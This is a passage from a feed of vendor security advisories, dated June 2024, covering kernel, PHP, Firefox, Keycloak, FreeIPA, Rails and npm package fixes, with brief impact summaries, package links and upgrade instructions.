Fix out-of-bounds memory access (David Arcari) [RHEL-31305] {CVE-2024-26664}- RDMA/irdma: Fix KASAN issue with tasklet (Kamal Heib) [RHEL-15776]- net: bridge: use DEV_STATS_INC() (Ivan Vecera) [RHEL-27989] {CVE-2023-52578}- net: Fix unwanted sign extension in netdev_stats_to_stats64() (Ivan Vecera) [RHEL-27989] {CVE-2023-52578}- net: add atomic_long_t to net_device_stats fields (Ivan Vecera) [RHEL-27989] {CVE-2023-52578}- net/sched: act_ct: fix skb leak and crash on ooo frags (Xin Long) [RHEL-29467] {CVE-2023-52610}- net: usb: smsc75xx: Fix uninit-value access in __smsc75xx_read_reg (Jose Ignacio Tornos Martinez) [RHEL-28015] {CVE-2023-52528}- RDMA/core: Fix uninit-value access in ib_get_eth_speed() (Kamal Heib) [RHEL-30130]- RDMA/core: Get IB width and speed from netdev (Kamal Heib) [RHEL-30130]- cpufreq: intel_pstate: Add Emerald Rapids support in no-HWP mode (Prarit Bhargava) [RHEL-29444]- powerpc/mm: Fix null-pointer dereference in pgtable_cache_add (Mamatha Inamdar) [RHEL-29118] {CVE-2023-52607}- powerpc/lib: Validate size for vector operations (Mamatha Inamdar) [RHEL-29114] {CVE-2023-52606}- usb: hub: Guard against accesses to uninitialized BOS descriptors (Desnes Nunes) [RHEL-28986] {CVE-2023-52477}- media: uvcvideo: Fix OOB read (Desnes Nunes) [RHEL-27940] {CVE-2023-52565}- media: pvrusb2: fix use after free on context disconnection (Desnes Nunes) [RHEL-26498] {CVE-2023-52445}- i2c: i801: Fix block process call transactions (Prarit Bhargava) [RHEL-26478] {CVE-2024-26593}- overlay: disable EVM (Coiby Xu) [RHEL-19863]- evm: add support to disable EVM on unsupported filesystems (Coiby Xu) [RHEL-19863]- evm: don't copy up 'security.evm' xattr (Coiby Xu) [RHEL-19863]- net: ena: Remove ena_select_queue (Kamal Heib) [RHEL-14286]- media: dvbdev: Fix memory leak in dvb_media_device_free() (Prarit Bhargava) [RHEL-27254] {CVE-2020-36777}- gfs2: Fix invalid metadata access in punch_hole (Andrew Price) [RHEL-28784]- i2c: Fix a potential use after free (Prarit Bhargava) [RHEL-26849] {CVE-2019-25162}- i2c: validate user data in compat ioctl (Prarit Bhargava) [RHEL-27022] {CVE-2021-46934}- platform/x86: think-lmi: Fix reference leak (Prarit Bhargava) [RHEL-28030] {CVE-2023-52520}- vhost: use kzalloc() instead of kmalloc() followed by memset() (Jon Maloy) [RHEL-21505] {CVE-2024-0340}- RDMA/siw: Fix connection failure handling (Kamal Heib) [RHEL-28042] {CVE-2023-52513}- vt: fix memory overlapping when deleting chars in the buffer (Waiman Long) [RHEL-27778 RHEL-27779] {CVE-2022-48627}- x86/fpu: Stop relying on userspace for info to fault in xsave buffer (Steve Best) [RHEL-26669] {CVE-2024-26603}- mptcp: fix double-free on socket dismantle (Davide Caratti) [RHEL-22773] {CVE-2024-26782}- crypto: akcipher - Disable signing and decryption (Herbert Xu) [RHEL-17114] {CVE-2023-6240}- crypto: akcipher - default implementations for request callbacks (Herbert Xu) [RHEL-17114] {CVE-2023-6240}- crypto: testmgr - split akcipher tests by a key type (Herbert Xu) [RHEL-17114] {CVE-2023-6240}- workqueue: Warn when a rescuer could not be created (Waiman Long) [RHEL-22136]- RDMA/cma: Avoid GID lookups on iWARP devices (Benjamin Coddington) [RHEL-12456]- RDMA/cma: Deduplicate error flow in cma_validate_port() (Benjamin Coddington) [RHEL-12456]- RDMA/core: Set gid_attr.ndev for iWARP devices (Benjamin Coddington) [RHEL-12456]- RDMA/siw: Fabricate a GID on tun and loopback devices (Benjamin Coddington) [RHEL-12456]	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3618
05.06.2024 18:30:46	go	[GO-2024-2732] Evmos vulnerable to DOS and transaction fee expropriation through Authz exploit in github.com/evmos/evmos/v11		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2732
05.06.2024 15:10:07	rubysec	[RUBYSEC:ACTIONPACK-2024-28103] Missing security headers in Action Pack on non-HTML responses (medium)	Permissions-Policy is Only Served on HTML Content-TypeThe application configurable Permissions-Policy is only servedon responses with an HTML related Content-Type.This has been assigned the CVE identifier CVE-2024-28103.Versions Affected: >= 6.1.0Not affected: < 6.1.0Fixed Versions: 6.1.7.8, 7.0.8.4, and 7.1.3.4Impact------Responses with a non-HTML Content-Type are not serving the configuredPermissions-Policy. There are certain non-HTML Content-Types thatwould benefit from having the Permissions-Policy enforced.Releases--------The fixed releases are available at the normal locations.Workarounds-----------N/APatches-------To aid users who aren't able to upgrade immediately we have providedpatches for the supported release series in accordance with our[maintenance policy](https://guides.rubyonrails.org/maintenance_policy.html#security-issues)regarding security issues. They are in git-am format and consistof a single changeset.* 6-1-include-permissions-policy-header-on-non-html.patch - Patch for 6.1 series* 7-0-include-permissions-policy-header-on-non-html.patch - Patch for 7.0 series* 7-1-include-permissions-policy-header-on-non-html.patch - Patch for 7.1 seriesCredits-------Thank you [shinkbr](https://hackerone.com/shinkbr) for reporting this!	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONPACK-2024-28103
05.06.2024 15:10:07	rubysec	[RUBYSEC:ACTIONTEXT-2024-32464] ActionText ContentAttachment can Contain Unsanitized HTML (medium)	Instances of ActionText::Attachable::ContentAttachment includedwithin a rich_text_area tag could potentially contain unsanitized HTML.This has been assigned the CVE identifier CVE-2024-32464.Versions Affected: >= 7.1.0Not affected: < 7.1.0Fixed Versions: 7.1.3.4Impact------This could lead to a potential cross site scripting issue within the Trix editor.Releases--------The fixed releases are available at the normal locations.Workarounds-----------N/APatches-------To aid users who aren't able to upgrade immediately we have providedpatches for the supported release series in accordance with our[maintenance policy](https://guides.rubyonrails.org/maintenance_policy.html#security-issues)regarding security issues. They are in git-am format and consistof a single changeset.* action_text_content_attachment_xss_7_1_stable.patch - Patch for 7.1 seriesCredits-------Thank you [ooooooo_q](https://hackerone.com/ooooooo_q) for reporting this!	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONTEXT-2024-32464
06.06.2024 17:40:16	android	[ASB-A-223376078] [There are two problems with killBackgroundProcesses in ActivityManager] (high)	In multiple functions of ActivityManagerService.java, there is a possible way to escape Google Play protection due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.	https://secdb.nttzen.cloud/security-advisory/android/ASB-A-223376078
08.06.2024 02:15:47	alpinelinux	[ALPINE:CVE-2024-0444] gst-plugins-bad vulnerability (high)	[From CVE-2024-0444] GStreamer AV1 Video Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of tile list data within AV1-encoded video files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22873.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-0444
08.06.2024 01:51:46	ubuntu	[USN-6821-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6821-1
08.06.2024 01:40:36	ubuntu	[USN-6820-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6820-1
07.06.2024 23:33:17	ubuntu	[USN-6819-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6819-1
07.06.2024 23:18:53	ubuntu	[USN-6818-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6818-1
07.06.2024 21:49:30	ubuntu	[USN-6817-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6817-1
07.06.2024 21:18:31	ubuntu	[USN-6816-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6816-1
07.06.2024 22:36:28	maven	[MAVEN:GHSA-92WP-JGHR-HH87] Weak encryption in Ninja Core (moderate)	The encrypt() function of Ninja Core v7.0.0 was discovered to use a weak cryptographic algorithm, leading to a possible leakage of sensitive information.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-92WP-JGHR-HH87
07.06.2024 17:40:43	android	[ASB-A-223376078] [There are two problems with killBackgroundProcesses in ActivityManager] (high)	In multiple functions of ActivityManagerService.java, there is a possible way to escape Google Play protection due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.	https://secdb.nttzen.cloud/security-advisory/android/ASB-A-223376078
09.06.2024 23:15:09	alpinelinux	[ALPINE:CVE-2024-4577] php82, php81, php83 vulnerability (critical)	[From CVE-2024-4577] In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-4577
09.06.2024 22:15:52	alpinelinux	[ALPINE:CVE-2024-5458] php83, php81, php82 vulnerability (medium)	[From CVE-2024-5458] In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, due to a code logic error, filtering functions such as filter_var when validating URLs (FILTER_VALIDATE_URL) for certain types of URLs the function will result in invalid user information (username + password part of URLs) being treated as valid user information. This may lead to the downstream code accepting invalid URLs as valid and parsing them incorrectly.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-5458
09.06.2024 22:15:52	alpinelinux	[ALPINE:CVE-2024-5585] php82, php81, php83 vulnerability (high)	[From CVE-2024-5585] In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, the fix for CVE-2024-1874 does not work if the command name includes trailing spaces. Original issue: when using XXXXXXXXX() command with array syntax, due to insufficient escaping, if the arguments of the executed command are controlled by a malicious user, the user can supply arguments that would execute arbitrary commands in Windows shell.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-5585
11.06.2024 00:38:07	npm	[NPM:GHSA-7V5V-9H63-CJ86] @grpc/grpc-js can allocate memory for incoming messages well above configured limits (moderate)	### ImpactThere are two separate code paths in which memory can be allocated per message in excess of the `grpc.max_receive_message_length` channel option: 1. If an incoming message has a size on the wire greater than the configured limit, the entire message is buffered before it is discarded. 2. If an incoming message has a size within the limit on the wire but decompresses to a size greater than the limit, the entire message is decompressed into memory, and on the server is not discarded.### PatchesThis has been patched in versions 1.10.9, 1.9.15, and 1.8.22	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-7V5V-9H63-CJ86
11.06.2024 00:36:49	npm	[NPM:GHSA-VVHJ-V88F-5GXR] ghtml Cross-Site Scripting (XSS) vulnerability (high)	## SummaryIt is possible to introduce user-controlled JavaScript code and trigger a Cross-Site Scripting (XSS) vulnerability in some cases.## Actions Taken- Updated the documentation to clarify that while `ghtml` escapes characters with special meaning in HTML, it does not provide comprehensive protection against all types of XSS attacks in every scenario. _This aligns with the approach taken by other template engines. Developers should be cautious and take additional measures to sanitize user input and prevent potential vulnerabilities._ More reading: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html- The backtick character (`) is now also escaped to prevent the creation of strings in most cases where a malicious actor somehow gains the ability to write JavaScript. This does not provide comprehensive protection either.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VVHJ-V88F-5GXR
10.06.2024 23:41:56	ubuntu	[USN-6825-1] ADOdb vulnerabilities (critical)	Several security issues were fixed in ADOdb.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6825-1
10.06.2024 22:28:08	ubuntu	[USN-6817-2] Linux kernel (OEM) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6817-2
10.06.2024 21:36:57	maven	[MAVEN:GHSA-69FP-7C8P-CRJR] Keycloak exposes sensitive information in Pushed Authorization Requests (PAR) (high)	A flaw was found in Keycloak in the OAuth 2.0 Pushed Authorization Requests (PAR). Client provided parameters were found to be included in plain text in the KC_RESTART cookie returned by the authorization server's HTTP response to a request_uri authorization request. This could lead to an information disclosure vulnerability.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-69FP-7C8P-CRJR
10.06.2024 20:13:01	ubuntu	[USN-6821-2] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6821-2
10.06.2024 19:09:36	ubuntu	[USN-6818-2] Linux kernel (ARM laptop) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6818-2
10.06.2024 17:27:14	ubuntu	[USN-6824-1] GIFLIB vulnerabilities (high)	Several security issues were fixed in giflib.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6824-1
10.06.2024 14:36:50	ubuntu	[USN-6823-1] MySQL vulnerabilities (medium)	Several security issues were fixed in MySQL.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6823-1
10.06.2024 11:42:42	ubuntu	[USN-6822-1] Node.js vulnerabilities (critical)	Several security issues were fixed in Node.js.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6822-1
10.06.2024 03:00:00	oraclelinux	[ELSA-2024-3754] ipa security update (important)	[4.11.0-15.0.1]- Set IPAPLATFORM=rhel when build on Oracle Linux [Orabug: 29516674]- Add bind to ipa-server-common Requires [Orabug: 36518596][4.11.0-15]- Resolves: RHEL-32231 CVE-2024-3183 ipa: freeipa: user can obtain a hash of the passwords of all domain users and perform offline brute force- Resolves: RHEL-31409 CVE-2024-2698 ipa: freeipa: delegation rules allow a proxy service to impersonate any user to access another target service	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3754
10.06.2024 03:00:00	oraclelinux	[ELSA-2024-3760] ipa security update (important)	[4.6.8-5.0.1.el7_9.17]- Blank out header-logo.png product-name.png- Replace login-screen-logo.png [Orabug: 20362818][4.6.8-5.el7_9.17]- Resolves: RHEL-29926 ipa: user can obtain a hash of the passwords of all domain users and perform offline brute force	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3760
10.06.2024 18:33:08	npm	[NPM:GHSA-W5XM-MX47-V7C8] lunary-ai/lunary allows users unauthorized access to projects (critical)	In lunary-ai/lunary version v1.2.13, an improper authorization vulnerability exists that allows unauthorized users to access and manipulate projects within an organization they should not have access to. Specifically, the vulnerability is located in the `checkProjectAccess` method within the authorization middleware, which fails to adequately verify if a user has the correct permissions to access a specific project. Instead, it only checks if the user is part of the organization owning the project, overlooking the necessary check against the `account_project` table for explicit project access rights. This flaw enables attackers to gain complete control over all resources within a project, including the ability to create, update, read, and delete any resource, compromising the privacy and security of sensitive information.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W5XM-MX47-V7C8
10.06.2024 17:22:22	almalinux	[ALSA-2024:3670] ruby:3.3 security, bug fix, and enhancement update (moderate)	ruby:3.3 security, bug fix, and enhancement update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3670
10.06.2024 17:17:10	almalinux	[ALSA-2024:3671] ruby:3.3 security, bug fix, and enhancement update (moderate)	ruby:3.3 security, bug fix, and enhancement update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3671
10.06.2024 17:40:44	android	[ASB-A-223376078] [There are two problems with killBackgroundProcesses in ActivityManager] (high)	In multiple functions of ActivityManagerService.java, there is a possible way to escape Google Play protection due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.	https://secdb.nttzen.cloud/security-advisory/android/ASB-A-223376078
12.06.2024 01:09:41	ubuntu	[USN-6819-2] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6819-2
12.06.2024 00:55:39	slackware	[SSA:2024-163-02] cups (medium)	New cups packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/cups-2.4.9-i586-1_slack15.0.txz: Upgraded. This update fixes bugs and a security issue: When starting the cupsd server with a Listen configuration item pointing to a symbolic link, the cupsd process can be caused to perform an arbitrary chmod of the provided argument, providing world-writable access to the target. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-35235 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/cups-2.4.9-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/cups-2.4.9-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/cups-2.4.9-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/cups-2.4.9-x86_64-1.txzMD5 signaturesSlackware 15.0 package:eb7a13c45409a0db64a5a5c344c2b249 cups-2.4.9-i586-1_slack15.0.txzSlackware x86_64 15.0 package:d270e3ec0741a67116a32bfa9301f4fe cups-2.4.9-x86_64-1_slack15.0.txzSlackware -current package:433355277a0f061d6a9b7fcb1f9ad5f5 ap/cups-2.4.9-i586-1.txzSlackware x86_64 -current package:49f32bc3bbcf751650cd28f1d4de4694 ap/cups-2.4.9-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg cups-2.4.9-i586-1_slack15.0.txz`Then, restart the cups server:`# sh /etc/rc.d/rc.cups restart`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-163-02
12.06.2024 00:55:08	slackware	[SSA:2024-163-01] mozilla-firefox	New mozilla-firefox packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-firefox-115.12.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/115.12.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-26/ https://www.cve.org/CVERecord?id=CVE-2024-5702 https://www.cve.org/CVERecord?id=CVE-2024-5688 https://www.cve.org/CVERecord?id=CVE-2024-5690 https://www.cve.org/CVERecord?id=CVE-2024-5691 https://www.cve.org/CVERecord?id=CVE-2024-5692 https://www.cve.org/CVERecord?id=CVE-2024-5693 https://www.cve.org/CVERecord?id=CVE-2024-5696 https://www.cve.org/CVERecord?id=CVE-2024-5700 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.12.0esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.12.0esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-127.0-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-127.0-x86_64-1.txzMD5 signaturesSlackware 15.0 package:31be3b8bcf0fc600289fd086c921e116 mozilla-firefox-115.12.0esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:4a46fcee6cc710fe47c6efeb269483f4 mozilla-firefox-115.12.0esr-x86_64-1_slack15.0.txzSlackware -current package:892ae9e3d7006e6a2a42d001f0d17abb xap/mozilla-firefox-127.0-i686-1.txzSlackware x86_64 -current package:eb4e76b154f08bc011300bab583f8464 xap/mozilla-firefox-127.0-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-firefox-115.12.0esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-163-01
11.06.2024 23:53:02	ubuntu	[USN-6821-3] Linux kernel (AWS) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6821-3
11.06.2024 23:22:44	maven	[MAVEN:GHSA-2CWW-FGMG-4JQC] Keycloak's admin API allows low privilege users to use administrative functions (high)	Users with low privileges (just plain users in the realm) are able to utilize administrative functionalities within Keycloak admin interface. This issue presents a significant security risk as it allows unauthorized users to perform actions reserved for administrators, potentially leading to data breaches or system compromise.Acknowledgements:Special thanks to Maurizio Agazzini for reporting this issue and helping us improve our project.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2CWW-FGMG-4JQC
11.06.2024 23:05:19	ubuntu	[USN-6820-2] Linux kernel (NVIDIA) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6820-2
12.06.2024 00:37:41	maven	[MAVEN:GHSA-M5VV-6R4H-3VJ9] Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability (moderate)	Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M5VV-6R4H-3VJ9
12.06.2024 00:37:41	npm	[NPM:GHSA-M5VV-6R4H-3VJ9] Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability (moderate)	Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M5VV-6R4H-3VJ9
11.06.2024 20:45:43	ubuntu	[USN-6828-1] Linux kernel (Intel IoTG) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6828-1
11.06.2024 15:37:39	ubuntu	[USN-6826-1] mod_jk vulnerability (high)	mod_jk could allow unintended access to network services.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6826-1
11.06.2024 15:24:46	ubuntu	[USN-6823-1] MySQL vulnerabilities (medium)	Several security issues were fixed in MySQL.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6823-1
11.06.2024 15:15:50	ubuntu	[USN-6817-2] Linux kernel (OEM) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6817-2
11.06.2024 06:04:35	ubuntu	[USN-6827-1] LibTIFF vulnerability (medium)	LibTIFF could be made to crash if it opened a specially craftedfile.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6827-1
11.06.2024 03:00:00	debian	[DSA-5707-1] vlc	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5707-1
11.06.2024 03:00:00	debian	[DSA-5708-1] cyrus-imapd (medium)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5708-1
11.06.2024 03:00:00	mozilla	[MFSA-2024-26] Security Vulnerabilities fixed in Firefox ESR 115.12 (high)	- CVE-2024-5688: Use-after-free in JavaScript object transplant (high)If a garbage collection was triggered at the right time, a use-after-free could have occurred during object transplant.- CVE-2024-5690: External protocol handlers leaked by timing attack (moderate)By monitoring the time certain operations take, an attacker could have guessed which external protocol handlers were functional on a user's system.- CVE-2024-5691: Sandboxed iframes were able to bypass sandbox restrictions to open a new window (moderate)By tricking the browser with a <code>X-Frame-Options</code> header, a sandboxed iframe could have presented a button that, if clicked by a user, would bypass restrictions to open a new window.- CVE-2024-5692: Bypass of file name restrictions during saving (moderate)On Windows 10, when using the 'Save As' functionality, an attacker could have tricked the browser into saving the file with a disallowed extension such as <code>.url</code> by including an invalid character in the extension. Note: This issue only affected Windows operating systems. Other operating systems are unaffected.- CVE-2024-5693: Cross-Origin Image leak via Offscreen Canvas (moderate)Offscreen Canvas did not properly track cross-origin tainting, which could be used to access image data from another site in violation of same-origin policy.- CVE-2024-5696: Memory Corruption in Text Fragments (moderate)By manipulating the text in an <code><input></code> tag, an attacker could have caused corrupt memory leading to a potentially exploitable crash.- CVE-2024-5700: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (high)Memory safety bugs present in Firefox 126, Firefox ESR 115.11, and Thunderbird 115.11. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.- CVE-2024-5702: Use-after-free in networking (high)Memory corruption in the networking stack could have led to a potentially exploitable crash.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-26
11.06.2024 03:00:00	mozilla	[MFSA-2024-25] Security Vulnerabilities fixed in Firefox 127 (high)	- CVE-2024-5687: An incorrect principal could have been used when opening new tabs (high)If a specific sequence of actions is performed when opening a new tab, the triggering principal associated with the new tab may have been incorrect. The triggering principal is used to calculate many values, including the <code>Referer</code> and <code>Sec-</code> headers, meaning there is the potential for incorrect security checks within the browser in addition to incorrect or misleading information sent to remote websites.This bug only affects Firefox for Android. Other versions of Firefox are unaffected.- CVE-2024-5688: Use-after-free in JavaScript object transplant (high)If a garbage collection was triggered at the right time, a use-after-free could have occurred during object transplant.- CVE-2024-5689: User confusion and possible phishing vector via Firefox Screenshots (moderate)In addition to detecting when a user was taking a screenshot (XXX), a website was able to overlay the 'My Shots' button that appeared, and direct the user to a replica Firefox Screenshots page that could be used for phishing.- CVE-2024-5690: External protocol handlers leaked by timing attack (moderate)By monitoring the time certain operations take, an attacker could have guessed which external protocol handlers were functional on a user's system.- CVE-2024-5691: Sandboxed iframes were able to bypass sandbox restrictions to open a new window (moderate)By tricking the browser with a <code>X-Frame-Options</code> header, a sandboxed iframe could have presented a button that, if clicked by a user, would bypass restrictions to open a new window.- CVE-2024-5692: Bypass of file name restrictions during saving (moderate)On Windows, when using the 'Save As' functionality, an attacker could have tricked the browser into saving the file with a disallowed extension such as <code>.url</code> by including an invalid character in the extension. Note:* This issue only affected Windows operating systems. Other operating systems are unaffected.- CVE-2024-5693: Cross-Origin Image leak via Offscreen Canvas (moderate)Offscreen Canvas did not properly track cross-origin tainting, which could be used to access image data from another site in violation of same-origin policy.- CVE-2024-5694: Use-after-free in JavaScript Strings (moderate)An attacker could have caused a use-after-free in the JavaScript engine to read memory in the JavaScript string section of the heap.- CVE-2024-5695: Memory Corruption using allocation using out-of-memory conditions (moderate)If an out-of-memory condition occurs at a specific point using allocations in the probabilistic heap checker, an assertion could have been triggered, and in rarer situations, memory corruption could have occurred.- CVE-2024-5696: Memory Corruption in Text Fragments (moderate)By manipulating the text in an <code><input></code> tag, an attacker could have caused corrupt memory leading to a potentially exploitable crash.- CVE-2024-5697: Website was able to detect when Firefox was taking a screenshot of them (low)A website was able to detect when a user took a screenshot of a page using the built-in Screenshot functionality in Firefox.- CVE-2024-5698: Data-list could have overlaid address bar (low)By manipulating the fullscreen feature while opening a data-list, an attacker could have overlaid a text box over the address bar. This could have led to user confusion and possible spoofing attacks.- CVE-2024-5699: Cookie prefixes not treated as case-sensitive (low)In violation of spec, cookie prefixes such as <code>__Secure</code> were being ignored if they were not correctly capitalized - by spec they should be checked with a case-insensitive comparison. This could have resulted in the browser not correctly honoring the behaviors specified by the prefix.- CVE-2024-5700: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (high)Memory safety bugs present in Firefox 126, Firefox ESR 115.11, and Thunderbird 115.11. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.- CVE-2024-5701: Memory safety bugs fixed in Firefox 127 (high)Memory safety bugs present in Firefox 126. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-25
11.06.2024 03:00:00	oraclelinux	[ELSA-2024-3755] idm:DL1 security update (important)	bind-dyndb-ldapcustodiaipa[4.9.13-10.0.1]- Set IPAPLATFORM=rhel when build on Oracle Linux [Orabug: 29516674][4.9.13-10]- kdb: apply combinatorial logic for ticket flags (CVE-2024-3183) Resolves: RHEL-29927- kdb: fix vulnerability in GCD rules handling (CVE-2024-2698) Resolves: RHEL-29692ipa-healthcheckopendnssecpython-jwcryptopython-kdcproxypython-qrcodepython-yubicopyusbslapi-nissofthsm	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3755
11.06.2024 03:00:00	oraclelinux	[ELSA-2024-3783] firefox security update (moderate)	[115.11.0-1.0.1]- Add firefox-oracle-default-prefs.js and remove the corresponding OpenELA file[115.11.0-1]- Update to 115.11.0 build1	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3783
11.06.2024 03:00:00	oraclelinux	[ELSA-2024-3784] thunderbird security update (moderate)	[115.11.0-1.0.1]- Add Oracle prefs file[115.11.0-1]- Update to 115.11.0 build2	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3784
